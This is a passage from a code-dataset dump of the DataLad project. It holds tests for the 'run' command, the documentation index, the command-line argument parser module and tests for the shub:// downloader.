untracked=[ds1_subdir])\n\n # If we repeat above with an instance instead of the string, the directory\n # for the run is the specified dataset.\n with chpwd(ds1_subdir):\n run(\"cd .> five\", dataset=ds0)\n ok_exists(op.join(ds0.path, \"five\"))\n assert_repo_status(ds0.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_remove_keeps_leading_directory(path=None):\n ds = Dataset(op.join(path, \"ds\")).create()\n repo = ds.repo\n\n (ds.pathobj / \"d\").mkdir()\n output = (ds.pathobj / \"d\" / \"foo\")\n output.write_text(\"foo\")\n ds.save()\n\n output_rel = str(output.relative_to(ds.pathobj))\n repo.drop(output_rel, options=[\"--force\"])\n\n assert_in_results(\n ds.run(\"cd .> {}\".format(output_rel), outputs=[output_rel],\n result_renderer='disabled'),\n action=\"run.remove\", status=\"ok\")\n\n assert_repo_status(ds.path)\n\n # Remove still gets saved() if command doesn't generate the output (just as\n # it would if git-rm were used instead of unlink).\n repo.drop(output_rel, options=[\"--force\"])\n assert_in_results(\n ds.run(\"cd .> something-else\", outputs=[output_rel],\n result_renderer='disabled'),\n action=\"run.remove\", status=\"ok\")\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_reglob_outputs(path=None):\n ds = Dataset(path).create()\n repo = ds.repo\n (ds.pathobj / \"write_text.py\").write_text(\"\"\"\nimport sys\nassert len(sys.argv) == 2\nname = sys.argv[1]\nwith open(name + \".txt\", \"w\") as fh:\n fh.write(name)\n\"\"\")\n ds.save(to_git=True)\n cmd = [sys.executable, \"write_text.py\"]\n\n ds.run(cmd + [\"foo\"], outputs=[\"*.txt\"], expand=\"outputs\")\n assert_in(\"foo.txt\", last_commit_msg(repo))\n\n ds.run(cmd + [\"bar\"], outputs=[\"*.txt\"], explicit=True)\n ok_exists(str(ds.pathobj / \"bar.txt\"))\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_unexpanded_placeholders(path=None):\n ds = Dataset(path).create()\n cmd = [sys.executable, \"-c\",\n \"import sys; open(sys.argv[1], 'w').write(' '.join(sys.argv[2:]))\"]\n\n # It's weird, but for lack of better options, inputs and outputs that don't\n # have matches are available unexpanded.\n\n with assert_raises(IncompleteResultsError):\n ds.run(cmd + [\"arg1\", \"{inputs}\"], inputs=[\"foo*\"],\n on_failure=\"continue\")\n assert_repo_status(ds.path)\n ok_file_has_content(op.join(path, \"arg1\"), \"foo*\")\n\n ds.run(cmd + [\"arg2\", \"{outputs}\"], outputs=[\"bar*\"])\n assert_repo_status(ds.path)\n ok_file_has_content(op.join(path, \"arg2\"), \"bar*\")\n\n ds.run(cmd + [\"arg3\", \"{outputs[1]}\"], outputs=[\"foo*\", \"bar\"])\n ok_file_has_content(op.join(path, \"arg3\"), \"bar\")\n\n\n@with_tempfile(mkdir=True)\ndef test_run_empty_repo(path=None):\n ds = Dataset(path).create()\n cmd = [sys.executable, \"-c\", \"open('foo', 'w').write('')\"]\n # Using \"*\" in a completely empty repo will fail.\n with assert_raises(IncompleteResultsError):\n ds.run(cmd, inputs=[\"*\"], on_failure=\"stop\")\n assert_repo_status(ds.path)\n # \".\" will work okay, though.\n assert_status(\"ok\", ds.run(cmd, inputs=[\".\"]))\n assert_repo_status(ds.path)\n ok_exists(str(ds.pathobj / \"foo\"))\n\n\n@with_tree(tree={\"foo\": \"f\", \"bar\": \"b\"})\ndef test_dry_run(path=None):\n ds = Dataset(path).create(force=True)\n\n # The dataset is reported as dirty, and the custom result render relays\n # that to the default renderer.\n with swallow_outputs() as cmo:\n with assert_raises(IncompleteResultsError):\n ds.run(\"blah \", dry_run=\"basic\")\n assert_in(\"run(impossible)\", cmo.out)\n assert_not_in(\"blah\", cmo.out)\n\n ds.save()\n\n # unknown dry-run mode\n assert_raises(ValueError, ds.run, 'blah', dry_run='absurd')\n\n with swallow_outputs() as cmo:\n ds.run(\"blah \", dry_run=\"basic\")\n assert_in(\"Dry run\", cmo.out)\n assert_in(\"location\", cmo.out)\n assert_in(\"blah\", cmo.out)\n assert_not_in(\"expanded inputs\", cmo.out)\n assert_not_in(\"expanded outputs\", cmo.out)\n\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs} {outputs}\", dry_run=\"basic\",\n inputs=[\"fo*\"], outputs=[\"b*r\"])\n assert_in(\n 'blah \"foo\" \"bar\"' if on_windows else \"blah foo bar\",\n cmo.out)\n assert_in(\"expanded inputs\", cmo.out)\n assert_in(\"['foo']\", cmo.out)\n assert_in(\"expanded outputs\", cmo.out)\n assert_in(\"['bar']\", cmo.out)\n\n # Just the command.\n with swallow_outputs() as cmo:\n ds.run(\"blah \", dry_run=\"command\")\n assert_not_in(\"Dry run\", cmo.out)\n assert_in(\"blah\", cmo.out)\n assert_not_in(\"inputs\", cmo.out)\n\n # The output file wasn't unlocked.\n assert_repo_status(ds.path)\n\n # Subdaset handling\n\n subds = ds.create(\"sub\")\n (subds.pathobj / \"baz\").write_text(\"z\")\n ds.save(recursive=True)\n\n # If a subdataset is installed, it works as usual.\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs}\", dry_run=\"basic\", inputs=[\"sub/b*\"])\n assert_in(\n 'blah \"sub\\\\baz\"' if on_windows else 'blah sub/baz',\n cmo.out)\n\n # However, a dry run will not do the install/reglob procedure.\n ds.drop(\"sub\", what='all', reckless='kill', recursive=True)\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs}\", dry_run=\"basic\", inputs=[\"sub/b*\"])\n assert_in(\"sub/b*\", cmo.out)\n assert_not_in(\"baz\", cmo.out)\n\n\n@with_tree(tree={OBSCURE_FILENAME + \".t\": \"obscure\",\n \"normal.txt\": \"normal\"})\ndef test_io_substitution(path=None):\n files = [OBSCURE_FILENAME + \".t\", \"normal.txt\"]\n ds = Dataset(path).create(force=True)\n ds.save()\n # prefix the content of any given file with 'mod::'\n cmd = \"import sys; from pathlib import Path; t = [(Path(p), 'mod::' + Path(p).read_text()) for p in sys.argv[1:]]; [k.write_text(v) for k, v in t]\"\n cmd_str = \"{} -c \\\"{}\\\" {{inputs}}\".format(sys.executable, cmd)\n # this should run and not crash with permission denied\n ds.run(cmd_str, inputs=[\"{outputs}\"], outputs=[\"*.t*\"],\n result_renderer='disabled')\n # all filecontent got the prefix\n for f in files:\n ok_((ds.pathobj / f).read_text().startswith('mod::'))\n\n # we could just ds.rerun() now, and it should work, but this would make\n # rerun be a dependency of a core test\n # instead just double-run, but with a non-list input-spec.\n # should have same outcome\n ds.run(cmd_str, inputs=\"{outputs}\", outputs=\"*.t*\",\n result_renderer='disabled')\n for f in files:\n ok_((ds.pathobj / f).read_text().startswith('mod::mod::'))\n\n\ndef test_format_iospecs():\n seq = ['one', 'two']\n eq_(seq, _format_iospecs(['{dummy}'], dummy=seq))\n # garbage when combined with longer spec-sequences\n # but this is unavoidable without introducing a whitelist\n # of supported value types -- which would limit flexibility\n eq_([\"['one', 'two']\", 'other'],\n _format_iospecs(['{dummy}', 'other'], dummy=seq))\n\n\ndef test_substitution_config():\n # use a shim to avoid having to create an actual dataset\n # the tested function only needs a `ds.config` to be a ConfigManager\n from datalad import cfg\n\n class dset:\n config = cfg\n\n # empty be default\n eq_(_get_substitutions(dset), {})\n # basic access\n with patch_config({\"datalad.run.substitutions.dummy\": 'ork'}):\n eq_(_get_substitutions(dset), dict(dummy='ork'))\n # can report multi-value\n with patch_config({\"datalad.run.substitutions.dummy\": ['a', 'b']}):\n eq_(_get_substitutions(dset), dict(dummy=['a', 'b']))\n\n # verify combo with iospec formatting\n eq_(_format_iospecs(['{dummy}'],\n **_get_substitutions(dset)),\n ['a', 'b'])\n" }, { "alpha_fraction": 0.7093862891197205, "alphanum_fraction": 0.7129963636398315, "avg_line_length": 31.58823585510254, "blob_id": "33a294ab0185f02155de3e3303344f48719cd4c7", "content_id": "6a99e51ae803a30b505b3c72b7e460bb01ca5c5c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2216, "license_type": "permissive", "max_line_length": 131, "num_lines": 68, "path": "/docs/source/index.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "DataLad |---| data management and publication multitool\n*******************************************************\n\nWelcome to DataLad's **technical documentation**. Information here is targeting\nsoftware developers and is focused on the Python API and :term:`CLI`, as well\nas software design, employed technologies, and key features. Comprehensive\n**user documentation** with information on installation, basic operation,\nsupport, and (advanced) use case descriptions is available in the `DataLad\nhandbook <http://handbook.datalad.org>`_.\n\nContent\n^^^^^^^\n\n.. toctree::\n :maxdepth: 1\n\n changelog\n acknowledgements\n publications\n\nConcepts and technologies\n=========================\n\n.. toctree::\n :maxdepth: 2\n\n background\n related\n basics\n credentials\n customization\n design/index\n glossary\n\nCommands and API\n================\n\n.. toctree::\n :maxdepth: 2\n\n cmdline\n modref\n config\n\nExtension packages\n==================\n\nDataLad can be customized and additional functionality can be integrated via\nextensions. Each extension provides its own documentation:\n\n- `Crawling web resources and automated data distributions <http://docs.datalad.org/projects/crawler>`_\n- `Neuroimaging data and workflows <http://docs.datalad.org/projects/neuroimaging>`_\n- `Containerized computational environments <http://docs.datalad.org/projects/container>`_\n- `Advanced metadata tooling with JSON-LD reporting and additional metadata extractors <http://docs.datalad.org/projects/metalad>`_\n- `Staged additions, performance and user experience improvements for DataLad <http://docs.datalad.org/projects/next>`_\n- `Resources for working with the UKBiobank as a DataLad dataset <http://docs.datalad.org/projects/ukbiobank>`_\n- `Deposit and retrieve DataLad datasets via the Open Science Framework <http://docs.datalad.org/projects/osf>`_\n- `Functionality that has been phased out of the core package <http://docs.datalad.org/projects/deprecated>`_\n- `Special interest functionality or drafts of future additions to DataLad proper <http://docs.datalad.org/projects/mihextras>`_\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n.. |---| unicode:: U+02014 .. em dash\n" }, { "alpha_fraction": 0.6223336458206177, "alphanum_fraction": 0.6250462532043457, "avg_line_length": 39.15016555786133, "blob_id": "9b39861ef5932b3ade87eda32c39f765743ec9d7", "content_id": "b3c44026ca29644c749a1e625e9385a3b3a598ea", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24331, "license_type": "permissive", "max_line_length": 79, "num_lines": 606, "path": "/datalad/cli/parser.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Components to build the parser instance for the CLI\n\nThis module must import (and run) really fast for a responsive CLI.\nIt is unconditionally imported by the main() entrypoint.\n\"\"\"\n\n# ATTN!\n# All top-imports are limited to functionality that is necessary for the\n# non-error case of constructing of a single target command parser only.\n# For speed reasons, all other imports necessary for special cases,\n# like error handling, must be done conditionally in-line.\n\nimport argparse\nimport logging\nimport sys\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom datalad import __version__\nfrom datalad.interface.base import (\n get_cmd_doc,\n get_interface_groups,\n is_api_arg,\n load_interface,\n)\nfrom datalad.support.constraints import EnsureChoice\nfrom datalad.utils import getargspec\n\nfrom .common_args import common_args\nfrom .exec import call_from_parser\nfrom .helpers import get_commands_from_groups\nfrom .interface import (\n alter_interface_docs_for_cmdline,\n get_cmd_ex,\n get_cmdline_command_name,\n)\n\n# special case imports\n# .helpers import add_entrypoints_to_interface_groups\n# .helpers.get_description_with_cmd_summary\n# .helpers.get_commands_from_groups\n# .utils.get_suggestions_msg,\n# .interface._known_extension_commands\n# .interface._deprecated_commands\n\nlgr = logging.getLogger('datalad.cli.parser')\n\n\nhelp_gist = \"\"\"\\\nComprehensive data management solution\n\nDataLad provides a unified data distribution system built on the Git\nand Git-annex. DataLad command line tools allow to manipulate (obtain,\ncreate, update, publish, etc.) datasets and provide a comprehensive\ntoolbox for joint management of data and code. Compared to Git/annex\nit primarily extends their functionality to transparently and\nsimultaneously work with multiple inter-related repositories.\"\"\"\n\n\n# TODO: OPT look into making setup_parser smarter to become faster\n# Now it seems to take up to 200ms to do all the parser setup\n# even though it might not be necessary to know about all the commands etc.\n# I wondered if it could somehow decide on what commands to worry about etc\n# by going through sys.args first\ndef setup_parser(\n cmdlineargs,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n return_subparsers=False,\n completing=False,\n help_ignore_extensions=False):\n \"\"\"\n The holy grail of establishing CLI for DataLad's Interfaces\n\n Parameters\n ----------\n cmdlineargs: sys.argv\n Used to make some shortcuts when construction of a full parser can be\n avoided.\n formatter_class:\n Passed to argparse\n return_subparsers: bool, optional\n is used ATM only by BuildManPage in _datalad_build_support\n completing: bool, optional\n Flag to indicate whether the process was invoked by argcomplete\n help_ignore_extensions: bool, optional\n Prevent loading of extension entrypoints when --help is requested.\n This is enabled when building docs to avoid pollution of generated\n manpages with extensions commands (that should appear in their own\n docs, but not in the core datalad package docs)\n \"\"\"\n lgr.log(5, \"Starting to setup_parser\")\n\n # main parser\n parser = ArgumentParserDisableAbbrev(\n fromfile_prefix_chars=None,\n prog='datalad',\n # usage=\"%(prog)s ...\",\n description=help_gist,\n formatter_class=formatter_class,\n add_help=False,\n # TODO: when dropping support for Python 3.8: uncomment below\n # and use parse_known_args instead of _parse_known_args:\n # # set to False so parse_known_args does not add its error handling\n # # Added while RFing from using _parse_known_args to parse_known_args.\n # exit_on_error=False,\n )\n\n # common options\n parser_add_common_options(parser)\n\n # get all interface definitions from datalad-core\n interface_groups = get_interface_groups()\n\n # try to figure out whether the parser construction can be limited to\n # a single (sub)command -- don't even try to do this, when we are in\n # any of the doc-building capacities -- timing is not relevant there\n status, parseinfo = single_subparser_possible(\n cmdlineargs,\n parser,\n completing,\n ) if not return_subparsers else ('allparsers', None)\n\n command_provider = 'core'\n\n if status == 'allparsers' and not help_ignore_extensions:\n from .helpers import add_entrypoints_to_interface_groups\n add_entrypoints_to_interface_groups(interface_groups)\n\n # when completing and we have no incomplete option or parameter\n # we still need to offer all commands for completion\n if (completing and status == 'allknown') or (\n status == 'subcommand' and parseinfo not in\n get_commands_from_groups(interface_groups)):\n # we know the command is not in the core package\n # still a chance it could be in an extension\n command_provider = 'extension'\n # we need the full help, or we have a potential command that\n # lives in an extension, must load all extension, expensive\n from .helpers import add_entrypoints_to_interface_groups\n\n # need to load all the extensions and try again\n # TODO load extensions one-by-one and stop when a command was found\n add_entrypoints_to_interface_groups(interface_groups)\n\n if status == 'subcommand':\n known_commands = get_commands_from_groups(interface_groups)\n if parseinfo not in known_commands:\n # certainly not possible to identify a single parser that\n # could be constructed, but we can be helpful\n # will sys.exit() unless we are completing\n try_suggest_extension_with_command(\n parser, parseinfo, completing, known_commands)\n # in completion mode we can get here, even for a command\n # that does not exist at all!\n command_provider = None\n\n # TODO check if not needed elsewhere\n if status == 'help' or completing and status in ('allknown', 'unknownopt'):\n # --help specification was delayed since it causes immediate\n # printout of\n # --help output before we setup --help for each command\n parser_add_common_opt(parser, 'help')\n\n all_parsers = {} # name: (sub)parser\n\n if (completing and status == 'allknown') or status \\\n in ('allparsers', 'subcommand', 'error'):\n # parseinfo could be None here, when we could not identify\n # a subcommand, but need to locate matching ones for\n # completion\n # create subparser, use module suffix as cmd name\n subparsers = parser.add_subparsers()\n for _, _, _interfaces \\\n in sorted(interface_groups, key=lambda x: x[1]):\n for _intfspec in _interfaces:\n cmd_name = get_cmdline_command_name(_intfspec)\n if status == 'subcommand':\n # in case only a subcommand is desired, we could\n # skip some processing\n if command_provider and cmd_name != parseinfo:\n # a known command, but know what we are looking for\n continue\n if command_provider is None and not cmd_name.startswith(\n parseinfo):\n # an unknown command, and has no common prefix with\n # the current command candidate, not even good\n # for completion\n continue\n subparser = add_subparser(\n _intfspec,\n subparsers,\n cmd_name,\n formatter_class,\n completing=completing,\n )\n if subparser: # interface can fail to load\n all_parsers[cmd_name] = subparser\n\n # \"main\" parser is under \"datalad\" name\n all_parsers['datalad'] = parser\n lgr.log(5, \"Finished setup_parser\")\n if return_subparsers:\n # TODO why not pull the subparsers from the main parser?\n return all_parsers\n else:\n return parser\n\n\ndef setup_parser_for_interface(parser, cls, completing=False):\n # XXX needs safety check for name collisions\n # XXX allow for parser kwargs customization\n # get the signature, order of arguments is taken from it\n ndefaults = 0\n args, varargs, varkw, defaults = getargspec(\n cls.__call__, include_kwonlyargs=True)\n if defaults is not None:\n ndefaults = len(defaults)\n default_offset = ndefaults - len(args)\n prefix_chars = parser.prefix_chars\n for i, arg in enumerate(args):\n if not is_api_arg(arg):\n continue\n\n param = cls._params_[arg]\n defaults_idx = default_offset + i\n if param.cmd_args == tuple():\n # explicitly provided an empty sequence of argument names\n # this shall not appear in the parser\n continue\n\n # set up the parameter\n setup_parserarg_for_interface(\n parser, arg, param, defaults_idx, prefix_chars, defaults,\n completing=completing)\n\n\ndef setup_parserarg_for_interface(parser, param_name, param, defaults_idx,\n prefix_chars, defaults, completing=False):\n cmd_args = param.cmd_args\n parser_kwargs = param.cmd_kwargs\n has_default = defaults_idx >= 0\n if cmd_args:\n if cmd_args[0][0] in prefix_chars:\n # TODO: All the Parameter(args=...) values in this code\n # base use hyphens, so there is no point in the below\n # conversion. If it looks like no extensions rely on this\n # behavior either, this could be dropped.\n parser_args = [c.replace('_', '-') for c in cmd_args]\n else:\n # Argparse will not convert dashes to underscores for\n # arguments that don't start with a prefix character, so\n # the above substitution must be avoided so that\n # call_from_parser() can find the corresponding parameter.\n parser_args = cmd_args\n elif has_default:\n # Construct the option from the Python parameter name.\n parser_args = (\"--{}\".format(param_name.replace(\"_\", \"-\")),)\n else:\n # If args= wasn't given and its a positional argument in the\n # function, add a positional argument to argparse. If `dest` is\n # specified, we need to remove it from the keyword arguments\n # because add_argument() expects it as the first argument. Note\n # that `arg` shouldn't have a dash here, but `metavar` can be\n # used if a dash is preferred for the command-line help.\n parser_args = (parser_kwargs.pop(\"dest\", param_name),)\n\n if has_default:\n parser_kwargs['default'] = defaults[defaults_idx]\n if param.constraints is not None:\n parser_kwargs['type'] = param.constraints\n if completing:\n help = None\n # if possible, define choices to enable their completion\n if 'choices' not in parser_kwargs and \\\n isinstance(param.constraints, EnsureChoice):\n parser_kwargs['choices'] = [\n c for c in param.constraints._allowed if c is not None]\n else:\n help = _amend_param_parser_kwargs_for_help(\n parser_kwargs, param,\n defaults[defaults_idx] if defaults_idx >= 0 else None)\n # create the parameter, using the constraint instance for type\n # conversion\n parser.add_argument(*parser_args, help=help,\n **parser_kwargs)\n\n\ndef _amend_param_parser_kwargs_for_help(parser_kwargs, param, default=None):\n if 'metavar' not in parser_kwargs and \\\n isinstance(param.constraints, EnsureChoice):\n parser_kwargs['metavar'] = \\\n '{%s}' % '|'.join(\n # don't use short_description(), because\n # it also needs to give valid output for\n # Python syntax (quotes...), but here we\n # can simplify to shell syntax where everything\n # is a string\n p for p in param.constraints._allowed\n # in the cmdline None pretty much means\n # don't give the options, so listing it\n # doesn't make sense. Moreover, any non-string\n # value cannot be given and very likely only\n # serves a special purpose in the Python API\n # or implementation details\n if isinstance(p, str))\n help = alter_interface_docs_for_cmdline(param._doc)\n if help:\n help = help.rstrip()\n if help[-1] != '.':\n help += '.'\n if param.constraints is not None:\n help += _get_help_for_parameter_constraint(param)\n if default is not None and \\\n not parser_kwargs.get('action', '').startswith('store_'):\n # if it is a flag, in commandline it makes little sense to show\n # showing the Default: (likely boolean).\n # See https://github.com/datalad/datalad/issues/3203\n help += \" [Default: %r]\" % (default,)\n return help\n\n\ndef _get_help_for_parameter_constraint(param):\n # include value constraint description and default\n # into the help string\n cdoc = alter_interface_docs_for_cmdline(\n param.constraints.long_description())\n if cdoc[0] == '(' and cdoc[-1] == ')':\n cdoc = cdoc[1:-1]\n return ' Constraints: %s' % cdoc\n\n\ndef single_subparser_possible(cmdlineargs, parser, completing):\n \"\"\"Performs early analysis of the cmdline\n\n Looks at the first unparsed argument and if a known command,\n would return only that one.\n\n When a plain command invocation with `--version` is detected, it will be\n acted on directly (until sys.exit(0) to avoid wasting time on unnecessary\n further processing.\n\n Returns\n -------\n {'error', 'allknown', 'help', 'unknownopt', 'subcommand'}, None or str\n Returns a status label and a parameter for this status.\n 'error': parsing failed, 'allknown': the parser successfully\n identified all arguments, 'help': a help request option was found,\n 'unknownopt': an unknown or incomplete option was found,\n 'subcommand': a potential subcommand name was found. For the latter\n two modes the second return value is the option or command name.\n For all other modes the second return value is None.\n \"\"\"\n # Before doing anything additional and possibly expensive see may be that\n # we have got the command already\n try:\n parsed_args, unparsed_args = parser._parse_known_args(\n cmdlineargs[1:], argparse.Namespace())\n # before anything handle possible datalad --version\n if not unparsed_args and getattr(parsed_args, 'version', None):\n parsed_args.version() # will exit with 0\n if not (completing or unparsed_args):\n # there was nothing that could be a command\n fail_with_short_help(\n parser,\n msg=\"too few arguments, \"\n \"run with --help or visit https://handbook.datalad.org\",\n exit_code=2)\n lgr.debug(\"Command line args 1st pass for DataLad %s. \"\n \"Parsed: %s Unparsed: %s\",\n __version__, parsed_args, unparsed_args)\n except Exception as exc:\n # this did not work out\n from datalad.support.exceptions import CapturedException\n ce = CapturedException(exc)\n lgr.debug(\"Early parsing failed with %s\", ce)\n return 'error', None\n\n if not unparsed_args:\n # cannot possibly be a subcommand\n return 'allknown', None\n\n unparsed_arg = unparsed_args[0]\n\n # First unparsed could be either unknown option to top level \"datalad\"\n # or a command. Among unknown could be --help/--help-np which would\n # need to be dealt with\n if unparsed_arg in ('--help', '--help-np', '-h'):\n # not need to try to tune things, all these will result in everything\n # to be imported and parsed\n return 'help', None\n elif unparsed_arg.startswith('-'): # unknown or incomplete option\n if completing:\n return 'unknownopt', unparsed_arg\n # will sys.exit\n fail_with_short_help(parser,\n msg=f\"unrecognized argument {unparsed_arg}\",\n # matches exit code of InsufficientArgumentsError\n exit_code=2)\n else: # potential command to handle\n return 'subcommand', unparsed_arg\n\n\ndef try_suggest_extension_with_command(parser, cmd, completing, known_cmds):\n \"\"\"If completing=False, this function will trigger sys.exit()\"\"\"\n # check if might be coming from known extensions\n from .interface import (\n _deprecated_commands,\n _known_extension_commands,\n )\n extension_commands = {\n c: e\n for e, commands in _known_extension_commands.items()\n for c in commands\n }\n hint = None\n if cmd in extension_commands:\n hint = \"Command %s is provided by (not installed) extension %s.\" \\\n % (cmd, extension_commands[cmd])\n elif cmd in _deprecated_commands:\n hint_cmd = _deprecated_commands[cmd]\n hint = \"Command %r was deprecated\" % cmd\n hint += (\" in favor of %r command.\" % hint_cmd) if hint_cmd else '.'\n if not completing:\n fail_with_short_help(\n parser,\n hint=hint,\n provided=cmd,\n known=list(known_cmds.keys()) + list(extension_commands.keys())\n )\n\n\ndef add_subparser(_intfspec, subparsers, cmd_name, formatter_class,\n completing=False):\n \"\"\"Given an interface spec, add a subparser to subparsers under cmd_name\n \"\"\"\n _intf = load_interface(_intfspec)\n if _intf is None:\n # failed to load, error was already logged\n return\n\n # compose argparse.add_parser() arguments, focused on docs\n parser_args = dict(formatter_class=formatter_class)\n # use class description, if no explicit description is available\n intf_doc = get_cmd_doc(_intf)\n if not completing:\n parser_args['description'] = alter_interface_docs_for_cmdline(\n intf_doc)\n if hasattr(_intf, '_examples_'):\n intf_ex = alter_interface_docs_for_cmdline(get_cmd_ex(_intf))\n parser_args['description'] += intf_ex\n\n # create the sub-parser\n subparser = subparsers.add_parser(cmd_name, add_help=False, **parser_args)\n # our own custom help for all commands, we must do it here\n # (not in setup_parser_for_interface()) because the top-level parser must\n # not unconditionally have it available initially\n parser_add_common_opt(subparser, 'help')\n # let module configure the parser\n setup_parser_for_interface(subparser, _intf, completing=completing)\n # and we would add custom handler for --version\n parser_add_version_opt(\n subparser, _intf.__module__.split('.', 1)[0], include_name=True)\n # logger for command\n # configure 'run' function for this command\n plumbing_args = dict(\n # this is the key execution handler\n func=partial(call_from_parser, _intf),\n # use the logger of the module that defined the interface\n logger=logging.getLogger(_intf.__module__),\n subparser=subparser)\n if hasattr(_intf, 'result_renderer_cmdline'):\n plumbing_args['result_renderer'] = _intf.result_renderer_cmdline\n subparser.set_defaults(**plumbing_args)\n return subparser\n\n\nclass ArgumentParserDisableAbbrev(argparse.ArgumentParser):\n # Don't accept abbreviations for long options. This kludge was originally\n # added at a time when our minimum required Python version was below 3.5,\n # preventing us from using allow_abbrev=False. Now our minimum Python\n # version is high enough, but we still can't use allow_abbrev=False because\n # it suffers from the problem described in 6b3f2fffe (BF: cmdline: Restore\n # handling of short options, 2018-07-23).\n #\n # Modified from the solution posted at\n # https://bugs.python.org/issue14910#msg204678\n def _get_option_tuples(self, option_string):\n chars = self.prefix_chars\n if option_string[0] in chars and option_string[1] in chars:\n # option_string is a long flag. Disable abbreviation.\n return []\n return super(ArgumentParserDisableAbbrev, self)._get_option_tuples(\n option_string)\n\n\ndef parser_add_common_opt(parser, opt, names=None, **kwargs):\n opt_tmpl = common_args[opt]\n opt_kwargs = opt_tmpl[1].copy()\n opt_kwargs.update(kwargs)\n if names is None:\n parser.add_argument(*opt_tmpl[0], **opt_kwargs)\n else:\n parser.add_argument(*names, **opt_kwargs)\n\n\ndef parser_add_common_options(parser, version=None):\n \"\"\"Add all options defined in common_args, but excludes 'help'\"\"\"\n # populate with standard options\n for arg in common_args:\n if arg == 'help':\n continue\n parser_add_common_opt(parser, arg)\n # special case version arg\n if version is not None:\n import warnings\n warnings.warn(\"Passing 'version' to parser_add_common_options \"\n \"no longer has an effect \"\n \"and will be removed in a future release.\",\n DeprecationWarning)\n parser_add_version_opt(parser, 'datalad', include_name=True, delay=True)\n\n\ndef parser_add_version_opt(parser, mod_name, include_name=False, delay=False):\n \"\"\"Setup --version option\n\n Parameters\n ----------\n parser:\n mod_name: str, optional\n include_name: bool, optional\n delay: bool, optional\n If set to True, no action is taken immediately, and rather\n we assign the function which would print the version. Necessary for\n early pre-parsing of the cmdline\n \"\"\"\n\n def print_version():\n mod = sys.modules.get(mod_name, None)\n version = getattr(mod, '__version__', None)\n if version is None:\n # Let's use the standard Python mechanism if underlying module\n # did not provide __version__\n try:\n if sys.version_info < (3, 10):\n import importlib_metadata as im\n else:\n import importlib.metadata as im\n\n pkg = im.packages_distributions()[mod_name][0]\n version = im.version(pkg)\n except Exception:\n version = \"unknown\"\n if include_name:\n print(\"%s %s\" % (mod_name, version))\n else:\n print(version)\n sys.exit(0)\n\n class versionAction(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n if delay:\n setattr(args, self.dest, print_version)\n else:\n print_version()\n\n parser.add_argument(\n \"--version\",\n nargs=0,\n action=versionAction,\n help=(\n \"show the program's version\"\n if not mod_name\n else \"show the module and its version which provides the command\")\n )\n\n\ndef fail_with_short_help(parser=None,\n msg=None,\n known=None, provided=None,\n hint=None,\n exit_code=1,\n what=\"command\",\n out=None):\n \"\"\"Generic helper to fail\n with short help possibly hinting on what was intended if `known`\n were provided\n \"\"\"\n out = out or sys.stderr\n if msg:\n out.write(\"error: %s\\n\" % msg)\n if not known:\n if parser:\n parser_add_common_opt(parser, 'help')\n # just to appear in print_usage also consistent with --help output\n parser.add_argument(\"command [command-opts]\")\n parser.print_usage(file=out)\n else:\n out.write(\n \"datalad: Unknown %s %r. See 'datalad --help'.\\n\\n\"\n % (what, provided,))\n if provided not in known:\n from datalad.utils import get_suggestions_msg\n out.write(get_suggestions_msg(provided, known))\n if hint:\n out.write(\"Hint: %s\\n\" % hint)\n raise SystemExit(exit_code)\n" }, { "alpha_fraction": 0.5875251293182373, "alphanum_fraction": 0.5900402665138245, "avg_line_length": 30.55555534362793, "blob_id": "3a9cb38862607f87ab7c88fc6656034dd069b011", "content_id": "5f7084ca07d564c00cc8cbb366feb87b7fefe3c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1988, "license_type": "permissive", "max_line_length": 87, "num_lines": 63, "path": "/datalad/downloaders/tests/test_shub.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for shub:// downloader\"\"\"\n\nfrom datalad.downloaders.shub import SHubDownloader\nfrom datalad.support.exceptions import DownloadError\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n ok_file_has_content,\n serve_path_via_http,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n create_tree,\n)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_downloader_bad_query(urlpath=None, url=None):\n downloader = SHubDownloader()\n downloader.api_url = url\n with assert_raises(DownloadError):\n downloader.download(\"shub://org/repo\", urlpath)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_downloader_bad_json(urlpath=None, url=None):\n downloader = SHubDownloader()\n downloader.api_url = url\n create_tree(urlpath,\n tree={\"org\": {\"repo\": ''}})\n with assert_raises(DownloadError):\n downloader.download(\"shub://org/repo\", urlpath)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_downloader_download(urlpath=None, url=None, path=None):\n path = Path(path)\n downloader = SHubDownloader()\n downloader.api_url = url\n create_tree(urlpath,\n tree={\"data\": \"foo\",\n \"org\": {\"repo\":\n '{{\"name\":\"org/repo\",\"image\":\"{}\"}}'\n .format(url + \"data\")}})\n\n target = str(path / \"target\")\n downloader.download(\"shub://org/repo\", target)\n ok_file_has_content(target, \"foo\")\n\n other_target = str(path / \"other-target\")\n downloader.download(\"shub://org/repo\", other_target)\n" }, { 